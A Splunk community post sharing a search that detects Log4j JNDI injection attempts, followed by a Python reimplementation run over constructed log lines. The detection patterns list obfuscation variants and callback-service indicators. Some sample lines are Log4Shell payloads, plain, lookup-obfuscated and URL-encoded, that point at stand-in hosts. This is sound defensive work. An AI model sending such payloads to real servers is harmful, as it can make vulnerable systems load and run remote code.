Hello. As we know, trying to create an all-encompassing search for log4j is a very difficult task because of the infinite number of possibilities for entering the letters jndi and any of the possible protocols, e.g. ldap, dns, https, etc. We came up with this SPL, which has been very successful. However, there is a good possibility of some false positives. We haven't found too many though.

index=* AND "\$"
```All sites discussing log4j show examples containing at least one dollar sign. Therefore, we are only reporting those types of events.```
```No evidence (thus far) has been shown that these logs would contain log4j-type strings. Therefore, these logs are excluded.```
AND NOT source IN (/var/adm/messages, /var/adm/sulog, /var/adm/syslog*, /var/log/authlog, /var/log/messages, /var/log/secure, /var/log/syslog, /var/log/sudo.log, bandwidth, cpu, interfaces, iostat, netstat, openPorts, protocol, ps, top, vmstat, nfsiostat)
AND NOT sourcetype=syslog
```These 12 strings have been found in events with different variations of the log4j string.```
AND ((Basic AND Base64) OR "/securityscan" OR "/callback" OR exploit OR "/nessus" OR (interact OR interactsh) OR kryptoslogic OR "service.exfil.site" OR secresponstaskfrce OR billdemirkapi OR mburpcollab OR leakix)
```Flags/Indicators to match the different strings above. (?i) makes each regex case-insensitive, like the search terms above; match() is case-sensitive by default.```
| eval base64=if(match(_raw,"(?i)base64"),"X","")
| eval dnsscan=if(match(_raw,"(?i)/securityscan"),"X","")
| eval exploit=if(match(_raw,"(?i)exploit"),"X","")
| eval nessus=if(match(_raw,"(?i)/nessus"),"X","")
| eval interact=if(match(_raw,"(?i)interact"),"X","")
| eval kryptos=if(match(_raw,"(?i)kryptoslogic"),"X","")
| eval exfilsite=if(match(_raw,"(?i)service\.exfil\.site"),"X","")
| eval secrettask=if(match(_raw,"(?i)secresponstaskfrce"),"X","")
| eval billdemirk=if(match(_raw,"(?i)billdemirkapi"),"X","")
| eval burpcollab=if(match(_raw,"(?i)mburpcollab"),"X","")
| eval leakix=if(match(_raw,"(?i)leakix"),"X","")
```These are the known protocols where log4j attacks have been seen. These matches look for the first letter used for each protocol (j), followed by anything, then the next letter (n), etc. This "hopefully" will catch any/all possible variations used by attackers. Note: A future search is being designed to find where URL encoding replaces any/all of the letters within each JNDI protocol string.```
| where match(_raw,"j.*n.*d.*i.*\:.*l.*d.*a.*p")
or match(_raw,"j.*n.*d.*i.*\:.*d.*n.*s")
or match(_raw,"j.*n.*d.*i.*\:.*r.*m.*i")
or match(_raw,"j.*n.*d.*i.*\:.*l.*d.*a.*p.*s")
or match(_raw,"j.*n.*d.*i.*\:.*n.*i.*s")
or match(_raw,"j.*n.*d.*i.*\:.*i.*i.*o.*p")
or match(_raw,"j.*n.*d.*i.*\:.*c.*o.*r.*b.*a")
or match(_raw,"j.*n.*d.*i.*\:.*n.*d.*s")
or match(_raw,"j.*n.*d.*i.*\:.*h.*t.*t.*p")
or match(_raw,"j.*n.*d.*i.*\:.*h.*t.*t.*p.*s")
or match(_raw,":-")
or match(_raw,"lower\:")
or match(_raw,"upper\:")
or match(_raw,"date\:")
or match(_raw,"env\:")
or match(_raw,"jndi")
| sort 0 -_time
| table _time, index, host, source, status, base64, dnsscan, exploit, nessus, interact, kryptos, exfilsite, secrettask, billdemirk, burpcollab, leakix, _raw, http_user_agent

We have also found events substituting URL-encoded characters for jndi. Please let me, and the rest of our Splunk community, know if there are any issues with this search, as well as any new text signatures discovered other than those in Step 2, and any other discoveries. Together, let's find and stop this vulnerability.

Thanks and God bless,
Genesius
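The detection logic of the post, rerun outside Splunk as an added example (this is not the original poster's code and not Splunk's): the ordered-letter "loose" patterns and the indicator flags from the SPL above, plus the URL-decoding and `${lower:x}` / `${upper:x}` / `${...:-x}` collapsing that the post says it has seen and plans to search for. The sample log lines, hostnames and IPs are constructed for this example; the `normalize()` routine is a simplified model of Log4j lookup evaluation (innermost lookups first, nothing else), which is an assumption, not a claim about the library.

```python
"""Added example, not from the Splunk post: the post's detection logic in
Python over constructed log lines, with a normalization step for the
URL-encoded and lookup-obfuscated variants the post mentions."""
import re
from urllib.parse import unquote

# JNDI protocols listed in the post. Longer names first so that "ldaps"
# is not reported as "ldap" by the strict check.
PROTOCOLS = ("ldaps", "ldap", "https", "http", "iiop", "corba",
             "dns", "rmi", "nis", "nds")

# Indicator strings from the post's flag list, matched case-insensitively
# (the post's eval/match() calls are case-sensitive unless prefixed (?i)).
INDICATORS = {
    "base64": r"(?=.*basic)(?=.*base64)", "dnsscan": r"/securityscan",
    "exploit": r"exploit", "nessus": r"/nessus", "interact": r"interact(sh)?",
    "kryptos": r"kryptoslogic", "exfilsite": r"service\.exfil\.site",
    "secrettask": r"secresponstaskfrce", "billdemirk": r"billdemirkapi",
    "burpcollab": r"mburpcollab", "leakix": r"leakix",
}

def loose_regex(proto):
    """The post's ordered-letter pattern, e.g. j.*n.*d.*i.*:.*l.*d.*a.*p"""
    return re.compile("j.*n.*d.*i.*:.*" + ".*".join(proto), re.I | re.S)

LOOSE = [(p, loose_regex(p)) for p in PROTOCOLS]

# Innermost ${lower:x} / ${upper:x} lookups and ${anything:-x} defaults.
# Applied repeatedly so nested lookups collapse from the inside out.
# (Simplified model of lookup evaluation; assumption for this example.)
LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}|\$\{[^${}]*?:-([^${}]*)\}", re.I)

# What the attacker string has to look like once obfuscation is removed.
STRICT = re.compile(r"jndi:(" + "|".join(PROTOCOLS) + r")://", re.I)

def normalize(line, max_rounds=10):
    """URL-decode until stable, then collapse lookups until stable."""
    for _ in range(max_rounds):
        decoded = unquote(line)
        if decoded == line:
            break
        line = decoded
    for _ in range(max_rounds):
        collapsed = LOOKUP.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), line)
        if collapsed == line:
            break
        line = collapsed
    return line

def classify(line):
    """Return which loose patterns fired on the raw line, which indicator
    flags fired, and the protocol found by the strict check after
    normalization (None when nothing is found)."""
    loose_hits = [p for p, rx in LOOSE if rx.search(line)]
    flags = [name for name, pat in INDICATORS.items() if re.search(pat, line, re.I)]
    m = STRICT.search(normalize(line))
    return {"loose": loose_hits, "flags": flags,
            "strict": m.group(1).lower() if m else None}

# Constructed sample events (documentation IP space, example.com hosts).
SAMPLE_LINES = [
    'GET /?x=${jndi:ldap://198.51.100.7:1389/a} HTTP/1.1 "Mozilla/5.0"',
    'GET / HTTP/1.1 "${${lower:j}${upper:n}${lower:d}i:${lower:l}dap://interact.example.com/x}"',
    'GET /?q=%24%7Bjndi%3Armi%3A%2F%2Fexample.com%2Fa%7D HTTP/1.1',
    'POST /login "${env:NOPE:-j}ndi:dns://nessus.example.com/x" /securityscan',
    'java.naming.directory.initial context: ldap plugin loaded (no attack here)',
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        print(classify(line), "<-", line[:60])
```

Two things the run shows that the SPL alone does not: the fully URL-encoded line (third sample) has no literal colon, so none of the loose `j.*n.*d.*i.*:` patterns fire on `_raw`, while the strict check finds `rmi` after decoding; and the benign Java line (last sample) matches the loose `ldap` pattern by letter order alone, which is the kind of false positive the post warns about, and only the normalized strict check clears it.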